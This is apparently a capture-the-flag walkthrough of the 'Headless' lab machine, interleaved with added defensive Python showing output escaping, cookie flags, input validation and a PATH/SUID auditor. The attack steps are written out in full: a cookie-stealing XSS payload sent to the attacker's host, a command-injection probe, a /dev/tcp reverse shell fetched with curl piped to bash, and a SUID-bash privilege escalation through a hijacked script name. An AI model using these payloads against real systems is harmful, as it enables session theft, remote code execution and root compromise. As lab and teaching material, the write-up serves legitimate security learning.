sudo nmap -Pn -sT -sU -sC -sV 10.10.11.242
I add headless.htb to /etc/hosts with the corresponding IP address, then navigate to http://headless.htb:5000:
echo "10.10.11.8 headless.htb" | sudo tee -a /etc/hosts
dirsearch -u http://headless.htb:5000
We can see that there are two pages available: /support and /dashboard. Let's visit both of them to find our way into the machine.
To access /dashboard, we either need to be logged in as a user with elevated privileges (admin), but I don't see a login page, or we need to trick the server into believing that we are authorized to access the URL. When considering how to trick the server, I think about providing it with either an admin cookie or an admin session ID.
We need to provide a payload that can capture the cookies of the admin user who will be reviewing our support queries. The payload will look like this:
<script>document.location='http://<Your_Kali_IP>/?cookie='+document.cookie</script>
Additionally, we can URL encode this payload by pressing Ctrl + U. Along with this payload, we also need to start an HTTP server using the following command:
python3 -m http.server 80
At this stage, we need to test the XSS payload across all parameters present in the POST request, including message, email, User-Agent, and others. After testing, we'll discover that the same payload must be inserted into two specific parameters: message and User-Agent.
After waiting for a minute, we can see that we have received the admin user’s cookie. Now, we can add this cookie value to our browser using the inspect element feature or cookie editor add-on.
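The cookie theft above works because the admin's page renders the message and User-Agent fields as raw HTML and the session cookie is readable from JavaScript. The following Python is an added example of the two server-side fixes, not code from the Headless machine: attacker-controlled fields are HTML-escaped before they reach the admin view, and the session cookie is issued with HttpOnly, Secure and SameSite. The cookie name `session`, the field names and the sample ticket are assumptions constructed for the example.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample: the fields an attacker controls in the support request.
# The message carries the same kind of cookie-exfiltration script used above.
SAMPLE_TICKET = {
    "email": "user@example.com",
    "message": "<script>document.location='http://ATTACKER_HOST/?cookie='+document.cookie</script>",
    "user_agent": "Mozilla/5.0 <img src=x onerror=alert(1)>",
}

ADMIN_VISIBLE_FIELDS = ("email", "message", "user_agent")


def render_ticket_for_admin(ticket: dict) -> str:
    """Build the HTML fragment the admin sees.

    Every attacker-controlled value is escaped with quote=True, so <, >, &, "
    and ' become entities and the payload renders as inert text instead of markup.
    """
    rows = []
    for field in ADMIN_VISIBLE_FIELDS:
        value = html.escape(ticket.get(field, ""), quote=True)
        rows.append(f"<tr><td>{html.escape(field)}</td><td>{value}</td></tr>")
    return "<table>" + "".join(rows) + "</table>"


def build_admin_session_cookie(session_id: str) -> str:
    """Serialize the admin session cookie with the flags that blunt cookie theft.

    HttpOnly keeps document.cookie from reading it (the XSS above would get an
    empty string), Secure restricts it to TLS, and SameSite=Strict stops other
    origins from sending it. 'session' is an assumed cookie name.
    """
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Strict"
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


def contains_active_markup(fragment: str) -> bool:
    """Cheap check used for review and tests: a correctly escaped fragment has no
    raw <script> or <img> tag left in it (escaped tags start with &lt;)."""
    lowered = fragment.lower()
    return "<script" in lowered or "<img" in lowered


if __name__ == "__main__":
    print(render_ticket_for_admin(SAMPLE_TICKET))
    print("Set-Cookie:", build_admin_session_cookie("abc123"))
```

Escaping at render time is what removes the XSS; the cookie flags are defence in depth so that a future rendering bug no longer yields a usable admin cookie.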
Navigate to http://headless.htb:5000/dashboard to access the Administrator Dashboard. Here, you'll encounter an option to generate the website's health report for a specific date. Let's intercept this request via Burp Suite and send the POST request to the Repeater tool.
Within the body of this request, locate the date parameter. We’ll attempt to detect a command injection vulnerability using this parameter by employing the following payload:
&& pwd
Additionally, we can URL encode this payload by pressing Ctrl + U. Now, let's send the request and check the response, where we will find that the date parameter is vulnerable to command injection.
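The injection succeeds because the date value is concatenated into a shell command line. As an added example, not code from the machine, the Python below shows how the handler should treat that parameter: accept only a literal YYYY-MM-DD, pass it as a single argv element so no shell ever parses it, and flag values carrying shell metacharacters for the request log. The report generator is a hypothetical command (echo stands in for it) and the sample inputs are constructed.

```python
import re
import subprocess
from datetime import date
from typing import List

# Strict shape check first; date.fromisoformat then rejects impossible dates.
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")

# Shell metacharacters that have no business in a date: '&& pwd' from the
# writeup, but also ';', '|', backticks, '$(...)', redirects and newlines.
SHELL_META_RE = re.compile(r"[;&|`$<>\n]")


def parse_report_date(raw: str) -> date:
    """Return the date if raw is exactly YYYY-MM-DD, otherwise raise ValueError."""
    if not DATE_RE.fullmatch(raw):
        raise ValueError(f"rejected date parameter: {raw!r}")
    return date.fromisoformat(raw)


def is_valid_report_date(raw: str) -> bool:
    """Boolean wrapper around parse_report_date for callers that just need yes/no."""
    try:
        parse_report_date(raw)
        return True
    except ValueError:
        return False


def build_report_command(raw: str) -> List[str]:
    """Argument vector for the (hypothetical) report generator.

    The validated date becomes one argv element. Because subprocess.run is
    called with a list and shell=False, '&&' would be a literal argument,
    never an operator, even if validation were bypassed.
    """
    d = parse_report_date(raw)
    return ["echo", "report", d.isoformat()]  # 'echo' stands in for the real generator


def run_report(raw: str) -> str:
    """Validate, then run without a shell; returns the generator's stdout."""
    result = subprocess.run(
        build_report_command(raw), capture_output=True, text=True, check=True
    )
    return result.stdout.strip()


def is_injection_attempt(raw: str) -> bool:
    """Detection helper for access logs: True when the decoded date parameter
    carries shell metacharacters, which is what the '&& pwd' probe looks like."""
    return bool(SHELL_META_RE.search(raw))


if __name__ == "__main__":
    for candidate in ("2024-01-15", "2024-01-15 && pwd", "2024-13-45"):
        print(candidate, "valid" if is_valid_report_date(candidate) else "rejected",
              "injection?" if is_injection_attempt(candidate) else "")
```

The allow-list regex is what makes the parameter safe; the argv-list call is what keeps a second bug from turning into code execution.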
I make a file named payload.sh with the following inside it:
/bin/bash -c 'exec bash -i >& /dev/tcp/10.10.16.18/4444 0>&1'
The IP address should be your IP address, and the port number 4444 is the port on which I'm going to open my netcat listener:
nc -nlvp 4444
Finally, run the Python3 HTTP server to host the file (payload.sh) using the following command:
python3 -m http.server 8081
We want to insert a command that will fetch the payload file we created and run it. Make sure that you have your admin cookie listed in the cookie field (don't forget Ctrl + U):
curl http://10.10.16.18:8081/payload.sh|bash
We can see that the payload.sh file is downloaded by the web server and then executed, which results in a reverse shell on our netcat listener. From here we can get user.txt.
Now, let’s proceed to gain root access on the target machine. We’ll initiate by checking the sudo privileges using the following command:
sudo -l
Upon execution, it's revealed that the dvir user has permission to execute the /usr/bin/syscheck binary as the root user. Let's inspect the contents of this binary.
We'll discover that there's a bash script named initdb.sh that is executed without specifying its full path. Exploiting this vulnerability is straightforward; we create a malicious bash script with the same name. Executing the following commands accomplishes this:
echo "chmod u+s /bin/bash" > initdb.sh
chmod +x initdb.sh
Upon executing the syscheck binary, our malicious script in the current directory takes precedence. This script sets the SUID bit on /bin/bash, which is owned by root. To witness this in action, we run the command:
sudo /usr/bin/syscheck
Following this command execution, we proceed to execute /bin/bash with the owner's (root) privileges using the command:
/bin/bash -p
After executing the above command, we'll observe that we have successfully escalated our privileges to the root user. Consequently, we can effortlessly access the contents of the root.txt file.
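The root path above rests on two conditions: a script run under sudo that invokes another script by bare name, and a SUID bit that nobody noticed landing on /bin/bash. As an added example, not the machine's own syscheck (whose contents are not reproduced here), the Python below audits a sudo-able script for invocations that are resolved through PATH or the current directory rather than an absolute path, and checks a file mode for the SUID bit so a defender can spot a suid shell. The two sample scripts are constructed stand-ins.

```python
import os
import stat
from typing import List, Tuple

# Constructed stand-in for a script run via sudo; not the real syscheck.
VULNERABLE_SCRIPT = """#!/bin/bash
# hypothetical maintenance script
cd /var/log
df -h
/usr/bin/systemctl status ssh
initdb.sh
"""

# Same job done safely: PATH pinned and every external command absolute.
HARDENED_SCRIPT = """#!/bin/bash
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
cd /var/log
/usr/bin/df -h
/usr/bin/systemctl status ssh
/opt/tools/initdb.sh
"""

# Shell builtins and keywords never resolve through PATH, so they are not findings.
BUILTINS = {
    "cd", "echo", "export", "exit", "set", "unset", "if", "then", "else",
    "elif", "fi", "for", "while", "do", "done", "case", "esac", "return",
    "local", "read", "shift", "source", ".", "[", "[[", "test", "true", "false",
}


def unqualified_invocations(script_text: str) -> List[Tuple[int, str]]:
    """Return (line number, command word) for every command that is not an
    absolute path. A root-run script should name each executable absolutely;
    a bare 'initdb.sh' is exactly what lets a user-controlled copy win."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        word = stripped.split()[0]
        if word in BUILTINS or "=" in word:   # skip builtins and VAR=value lines
            continue
        if not word.startswith("/"):
            findings.append((lineno, word))
    return findings


def mode_has_suid(st_mode: int) -> bool:
    """True when a stat mode carries the set-user-ID bit."""
    return bool(st_mode & stat.S_ISUID)


def path_has_suid(path: str) -> bool:
    """Live check of a file on disk, e.g. path_has_suid('/bin/bash') after the
    privilege escalation above would return True."""
    return mode_has_suid(os.stat(path).st_mode)


if __name__ == "__main__":
    print("vulnerable:", unqualified_invocations(VULNERABLE_SCRIPT))
    print("hardened:", unqualified_invocations(HARDENED_SCRIPT))
    for shell in ("/bin/bash", "/bin/sh"):
        if os.path.exists(shell):
            print(shell, "suid" if path_has_suid(shell) else "not suid")
```

The checker is deliberately simple: it only looks at the first word of each line, so it flags the pattern in this writeup but will not follow pipelines or subshells.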